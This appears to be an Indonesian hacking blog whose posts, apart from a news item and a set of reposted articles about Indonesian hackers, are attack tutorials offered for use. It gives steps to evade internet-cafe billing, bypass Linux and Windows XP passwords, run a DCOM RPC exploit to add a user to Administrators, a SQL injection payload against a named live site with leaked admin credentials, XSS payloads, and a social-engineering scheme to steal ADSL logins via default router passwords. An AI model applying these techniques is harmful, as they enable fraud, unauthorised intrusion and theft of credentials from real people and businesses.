Inwepo News - Washington, Survei menyatakan hasil mengejutkan disebutkan bahwa kini Indonesia masuk peringkat kedua dalam daftar negara penghasil serangan peretas.




Survei keamanan internet menyebutkan bahwa China dan Indonesia kini 'memimpin' dengan peringkat teratas di daftar 177 negara yang menjadi sumber serangan peretas internet




Survei yang dilakukan firma Akamai asal AS menemukan bahwa China tetap paling atas menduduki daftar itu untuk paruh awal 2013, namun persentasenya menurun ke angka 34% dari sebelumnya 41% padakuartal terakhir 2012.




"Penurunan ini karena Indonesia yang tiba-tiba muncul di posisi kedua," ujar Bill Brenner dari Akamai, seperti dikutip dari TheAustralian.




Brenner mengatakan, Indonesia kini memiliki persentase serangan peretas 21%, naik dari angka 0,7% pada tahun sebelumnya.




Untuk tempat ketiga diduduki oleh AS, namun persentasenya menurun dari angka 8,3%, dari yang sebelumnya sebesar 10%.

• 0 komentar »

Hacking Billing Warnet
INGIN BROWSING DENGAN BIAYA MIRING DI WARNET

Segera Siapakan :
1. Program ZHider. Cari sendiri pake tante Google. Ukurannya kecil kok, ga sampe setengah isi disket.
2. Muka Meyakinkan
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Cara 2:

Nyalain kompi .Setelah loading windows tekan tahan Ctrl+Alt+Del sebelum keluar jendela billing(harus cepet coz jendela billing muncul hanya 2 detik setelah loading windows). Setelah kluar task manager klik ‘End Task’ pada aplikasi “client 008″.

Cara 3:

Menggunakan software “Billing Hack”(bisa download di http://www.vb-bego.com). Software ini bahkan bisa mereset time billing.

Bisa juga sebelum nyalain kompi cabut kabel LAN di belakang CPU. Biar gak terlalu mencurigakan, cabut kabelnya sambil pura-pura pasang USB ato Flash Disk (sambil nyelam mancing ikan gitu deh pepatahnya).Trus nyalain kompi tunggu sampai jendela billing keluar. Klik “Admin” masukkan password default “008″. Trus di Exit Client&Password masukkan juga password 008. Abis tu, setelah muncul kotak yang terakhir cari tanda ****** yang letaknya paling bawah kiri, delet tanda tsb dan terakhir klik ‘Exit Client’ yang terletak di sebelah kanan tanda yang telah kita hapus tadi. Jadi deh…

Kalo semua cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhoi Tuhan

• 0 komentar »

Secarik Berita Dan Cerita, Beberapa Hacker Indonesia. Bisa sajalah di sebut Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker. Ato apalah terserah.. Yang jelas inilah Hacker Indonesia.
Berikut ini menarik untuk dibaca, diambil dari berbagai sumber di dunia maya.. So taulah siapa unclenya.. Read this about Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker!
HARGA HACKER
Jangan tertipu dengan penampilannya. Dia itu seperti anak muda pada umumnya. Tak ada tanda-tanda bahwa dia orang yang “subur” rekening banknya. Memakai jins lawas, kaus, serta sepatu kets, dia datang ke kantor Koran Tempo. Saat ditawari ingin makan apa, jawabannya juga sederhana–malah kelewat sederhana untuk orang seperti dia. “Pecel lele saja,” katanya.
Satu-satunya pembeda dia dengan kebanyakan anak muda adalah laptop Apple di balik tasnya. Laptop yang ditempeli aneka stiker kelompok bawah tanah Internet itulah mesin uangnya. Cukup duduk beberapa menit di depan komputer, lalu membiarkan jemarinya menari-nari di atas papan ketik, ia bisa menghasilkan duit ratusan juga hingga miliaran rupiah. Kalau saja ia mau “uang receh” dan mengorbankan kehormatannya, banyak yang menawarinya menjebol kata sandi surat elektronik Yahoo! atau Gmail dengan bayaran paling murah Rp 10 juta. “Tapi buat apa?” katanya.
Dari laptop yang warnanya sudah tak kinclong lagi itu, dia menjajakan jasa “satpam komputer”. Dia menguji keamanan sistem tagihan telepon yang pelanggannya bisa berpuluh-puluh juta, atau sistem komputer milik sebuah bank. Dialah yang memastikan bahwa tak ada lubang sekecil apa pun yang bisa dimasuki oleh para peretas komputer yang bengal atau hacker hitam.
Dulu, selepas SMA, pekerjaannya adalah merenung di ujung jalan, menawarkan jasa pembuatan kartu undangan, atau membuat kunci cadangan. Ia adalah penunggu yang sabar. Jalanan telah membesarkannya, juga membuatnya kukuh bagai karang. Begitu kenal dengan komputer, lelaki ini menjelma menjadi “penunggu” komputer yang sabar. Dia bisa tahan belajar di depan layar selama tiga hari nonstop tanpa tidur, nyaris tak keluar kamar, dan cuma ditemani mi goreng instan.
Lelaki itu adalah salah satu keajaiban yang dimiliki Indonesia. Tak banyak jago komputer Indonesia yang bisa berpenghasilan tinggi, apalagi cuma lulusan sebuah SMA kampung. Orang Indonesia yang “makan bangku sekolahan” tinggi, seperti Harvard atau Massachusetts Institute of Technology, Amerika Serikat, gajinya pun tak tinggi.
Survei yang dilakukan majalah ZDNet Asia pada tahun ini menunjukkan bahwa gaji para jago komputer Indonesia ada di lembah paling rendah dibanding para koleganya yang bekerja di Hong Kong, India, Malaysia, Singapura, bahkan Filipina dan Thailand. Padahal, dua negara terakhir itu memiliki kemakmuran yang kurang-lebih sama dengan Indonesia.
Di Hong Kong, seorang jago komputer yang punya pengalaman lima tahun atau kurang rata-rata gajinya setahun mencapai US$ 42.360 (sekitar Rp 393 juta). Di Thailand dan Vietnam, gaji mereka mencapai US$ 10.809 (Rp 100,5 juta) dan US$ 6.893 (Rp 64 juta). Di Indonesia, nasib para pakar komputer itu tak selonggar di tiga negara tersebut. Gaji mereka setahun rata-rata cuma US$ 4.112 (Rp 38,2 juta). Itu artinya, gaji para jago komputer kita cuma sepersepuluh kolega mereka di Hong Kong.
Sahabat saya yang hacker, yang merevolusi hidupnya dari hacker jalanan menjadi pakar keamanan komputer korporat, itu sedih melihat data tersebut. “Orang-orang Indonesia kurang menghargai pentingnya informasi. Bingung, belingsatan, setelah sistem mereka jebol,” katanya sembari mencomot tempe goreng yang dihidangkan.
http://blog.tempointeraktif.com/?p=245
PENOLAKAN HACKER

Setelah UU ITE keluar banyak sekali web/blog yg mengalami ‘deface’. Sejak RUU ITE di keluarkan para blogger hacker mulai bergentayangan kesana kemari…. Mulai dari situs pemerintah, akademi, personal blog bahkan sampai situs iklan baris juga diserang. Blog ‘pengangguran’ ini pun kemarin seharian sempat mengalami deface menjadi putih bersih, dan sempat saya redirect ke tempat lain
Meski gak di rusak total tetep aja jengkel untung dah cepet kembali normal beberapa blog temen malah down dan di format ulang, dan sampai saat ini lom kembali nongol… dan ada juga temen yg emang sengaja di biarkan “buat kenang kenangan” katanya… coba mampir ke www.serbaiklan.com (kalau sempat) kata pemilik emang di sengaja mo di pigura kali kek..kek..kek…
Tujuan nya sih bagus “Indonesian Hacker Bersatu Menolak Pembodohan” cuma caranya nih yg kurang keren … coba kalau buat banner seperti “Save Google AdSense” dolo kan saya ikut pasang banner dan mendukung! kalau cara seperti ini sih males nge-dukung! bikin jengkel orang lain = nambah dosa tau.
http://ronys.info/index.php/2008/04/15/demam-hacker/
ANCAMAN TERHADAP HACKER

Ternyata tidak hanya mengirimkan gambar porno saja yang diancam hukuman penjara tiga tahun penjara dan denda Rp 1 miliar. Bagi mereka para hacker yang menggunakan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak untuk memperoleh, mengubah, merusak, atau menghilangkan informasi pertahanan nasional atau hubungan internasional yang dapat menyebabkan gangguan atau bahaya terhadap negara dan atau hubungan dengan subyek hukum internasional, maka akan dihukum delapan tahun penjara atau denda sebesar Rp 2 miliar.
Ancaman ini tidak main-main. Lebih-lebih kepada katagori komputer yang dilindungi. Komputer macam apa saja yang dilindungi? Menurut Menteri Komunikasi dan Informatika (Menkominfo), Prof Ir Mohammad Nuh DEA, dalam Pasal 27 Rancangan Undang-Undang (RUU) tentang Informasi dan Transaksi Elektronik dijelaskan bahwa ada beberapa katagori.
Di antaranya, katagori komputer eksklusif khusus. Komputer ini, untuk lembaga finansial pemerintah. Kedua, komputer yang secara luas digunakan oleh negara atau untuk berkomunikasi dan berniaga dengan pihak lainnya di luar negeri.
Bused, ampe sebanyak itu.. Ampun deh.. ooOoo
http://www.chip.co.id/special-reports/hacker-diancam-denda-rp-2-miliar-2.html
HACKER = KENAPA TIDAK BERIMBANG?
Jim Geovedi, yang dikenal sebagai konsultan sekuriti sekaligus anggota dari HERT, mempresentasikan beberapa profesi pekerjaan yang bisa dikategorikannya sebagai seorang yang mengerti teknik hacking atau hacker.
Jim menuturkan, ada beberapa profesi yang bisa dikelompokkan sebagai hacker. Profesi hacker tersebut kemudian dibaginya ke dalam dua kategori.
“Pertama corporate hacker, meliputi programmer, administrator, operator, security officer, IT auditor, konsultan TI, dan hacker. Kedua adalah independent hacker, termasuk operating system/software hacker, intrusion specialist, vulnerability researcher, botnet owner, rootkit/trojan/virus writer, dan spammer,” kata dia di sela-sela presentasinya dalam seminar Hacker’s Day di Jakarta, Kamis (12/6/2008).
Menurut Jim, kebanyakan hacker berprofesi sebagai programmer pada siang hari. “Mereka yang lebih mengerti bahasa pemrograman, sudah pasti mereka bisa hacking,” katanya sambil mengurai contoh programmer yang bekerja di Microsoft, Sun Microsystems, dan sejenisnya.
Lanjutnya, dia memaparkan administrator karena profesi ini, menurut Jim, paling mengerti tentang special equipment untuk infrastruktur seperti Firewall sebuah jaringan suatu perusahaan.
Selain itu, terdapat security officer yang bekerja sebagai penulis kebijakan policy dan prosedur untuk perusahaan dan mempunyai otoritas untuk menentukan akses dan keamanan dalam perusahaan. “Tentu mereka harus mengerti tentang keamanan dan pengamanan dari ancaman hacking,” Jim menuturkan.
Adapun hacker dijadikan profesi oleh sebuah perusahaan, namun menurut Jim hal itu jarang terjadi. “Kerja mereka biasanya ngecek keamanan sistem jaringan atau source code. Ada juga yang diadain buat gaya-gayaan doang,” ucap Jim.
Independent hacker dibedakan karena tidak berada di bawah badan atau afiliasi tertentu dan bekerja sebagai hacker untuk kepentingan diri sendiri. Salah satunya adalah operating system atau software hacker.
“Kerja mereka mendevelop software dan sistem operasi. Mereka bisa bekerja di mana saja, dan bayaran mereka 2-3 kali lipat pendapatan pekerja TI korporasi,” papar dia.
Di samping itu, intrusion specialist, vulnerability researcher, botnet owner, toolkit/trojan/virus writer dan spammer juga dikategorikan Jim sebagai independent hacker.
“Intrusion specialist menjadi salah satu yang paling digemari. Kerjanya ngebobol sistem atau jaringan orang. Biasanya mereka dicari-cari perusahaan untuk membobol jaringan kompetitornya,” ujar Jim.
“Kalau vulnerability researcher, kerjanya mencari kelemahan-kelemahan dari sebuah sistem atau jaringan dan mencari keuntungan dari situ. Berbeda dengan botnet owner, yang menguasai kontrol atas puluhan ribu host. Biasanya host-host ini disewakan untuk DDoS,” lanjut dia.
Sementara itu, Jim juga sempat mengatakan bahwa di Indonesia, hacker masih dikenal dengan sosok dengan image jahat padahal hacker sendiri mengawali aktivitas hackingnya atas dasar coba-coba.
“Aparat hukum malah menanggapi hal ini sebagai masalah serius. Ini tidak berimbang, tapi ini yang terjadi di Indonesia,” pungkas Jim. (srn)
Selengkapnya disini
PRESTASI HACKER
Saatnya pembuktian di kanca Internasional, bahwa kemajuan dunia internet di Indonesia bukan hanya karena hacker-hackernya yang terkenal sadis dan ceroboh dalam hal curi-mencuri kartu kredit ataupun data orang lain, atau maraknya money scheme yang berlatar belakang pembodohan dan penipuan.
Pada kesempatan SEO contest internasional kali ini; Busby SEO Challenge, pakar-pakar SEO dan marketing Indonesia didukung jutaan blogger bersatu, mendominasi 5 besar top ranking. Pogung, master SEO Indonesia, dan munculnya nama Yudi Abe, sang penulis di Ilmu Komputer, bersatunya SEO-er Bali mengatasnamakan IMFreakz, dan peserta-peserta lainnya, bersatu bahu-membahu untuk mengharumkan nama bangsa. Dukung kami !

• 0 komentar »

Boot Linux tanpa Password 
Melalui mode single pada GRUB ?

?? ?Hi, ketemu lagi dengan saya, sikeren Al-k. ;)
??? Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
??? tapi kali ini saya akan menjelaskannya pada Linux.
?? ?Mungkin pada artikel yang lain telah di jelaskan bagaimana
?? ?cara melakukan login tanpa password dengan bootloader Lilo,
?? ?tapi kali ini saya akan menjelaskannya pada bootloader Grub.

?? ?Beginilah caranya …

?? ?1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
?? ????? Pilih, yang Redhat Linux, terus tekan e di keyboard.
?? ????? Tombol e berguna untuk melakukan edit.

?? ?2.) http://h1.ripway.com/alk/grub.png
?? ????? setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba …
?? ????? tekan e dikeyboard

?? ?3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

?? ????? kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

?? ????? setelah itu Escape.

?? ?4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa??
???????? pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru? atau anda bisa
???????? mengedit file /etc/shadow, untuk menghilangkan password pada root.

?? ??? ? Jreng jreng jreng … satu lagi, anda login sebagai administrator tanpa password

// Greetz :

- Fel_c, Mentari^, BLACK.SCORPIO, Zahra_Fakhrunisa, Lady_Sizuka, Upie, Ipank
- Allguys in #khilafah, http://www.jcunited.tk

• 0 komentar »

SQL Injection pada Aj Auction untuk seluruh versi.

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya …
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett …
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel …

hehehehe … deface deface …

• 0 komentar »

Sedikit penjelasan mengenai XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika? melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya “nge-hack website” walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=

<script>alert(‘Tes, XSS-nya masih bisa’)</script>

http://www.malesbanget.com/kamus/definisi.php?kata=<script>alert(‘Tes, XSS-nya masih bisa’)</script>

kemudian tekan enter …
kemudian akan muncul popup baru berisi ‘Tes, XSS-nya masih bisa’

Terus … ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google. :)

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=<h1>Hacked by Me</h1><h7>

Cuma gitu doang ???
Iya… segitu dulu aja entar di lanjut lagi. Tunggu aja. :)

• 2 komentar »

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue … ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan ?Access Denied? adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng… heuheueehuhuehuee ! Jawab sendiri dah …

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual … huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh …

Langkah pertama … Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? … siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe… ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…

————————————————-
| Log On to Windows ??? ??? ??? ??? ??? ??? | x |
————————————————-
| User Name : Al-k ??? ??? ??? ??? ??? ????? ?? | 
| Password : ****** ??? ??? ??? ??? ??? ??? ??? |
|?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? |
| | Ok | | Cancel | | BLABLABLABLA….|???????? |
————————————————-

Ya, bentuknya kira-kira seperti diatas … : )…
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama … :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ?kaht? . Siap ???… buka command promptnya …

C:Documents and SettingsAl-k>net user

User accounts for \NOMATTER  -------------------------------------------------------------------------------  Administrator Al-k GNU-- keluarga --  Guest HelpAssistant SUPPORT_388945a0  VUSR_NOMATTER  The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:Data+ku_>

Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.

D:Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

  KAHT II - MASSIVE RPC EXPLOIT  DCOM RPC exploit. Modified by aT4r@3wdesign.es  #haxorcitos && #localhost @Efnet Ownz you!!!  FULL VERSION? :) - AUTOHACKING  ________________________________________________

 [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress...  - Connecting to 127.0.0.2

  Sending Exploit to a [WinXP] Server...  - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User. 



C:WINDOWSsystem32> net localgroup Administrators Al-k /add

  The command completed successfully.

  

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (

// Refferensi :
– Seni Tekhnik Hacking 1 [S?to]
– Echo Zine 10, Exploitasi Windows XP [mRt]
– Iseng Instink

// Greetz :
– y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S?to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can?t mentioned 1 by 1.
– Alumni SMAN4 Bogor & All guy?s in STTTelematika Ciawi Bogor.
– Special for Jheseecka & Melati ?Mel, ini artikel ke 1 dan ke 2-nya !!! :)?
– hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
– Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

• 0 komentar »

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :

Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )

Langkah Pertama

Silahkan anda baca artikelhttp://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.

Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :

Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U

Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,

Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)? | URL: / | Referrer: | Proxy:? | Koneksi:

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.

Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te –> bentuk lain dari ilmuwebsite

Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :

Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue

• 0 komentar »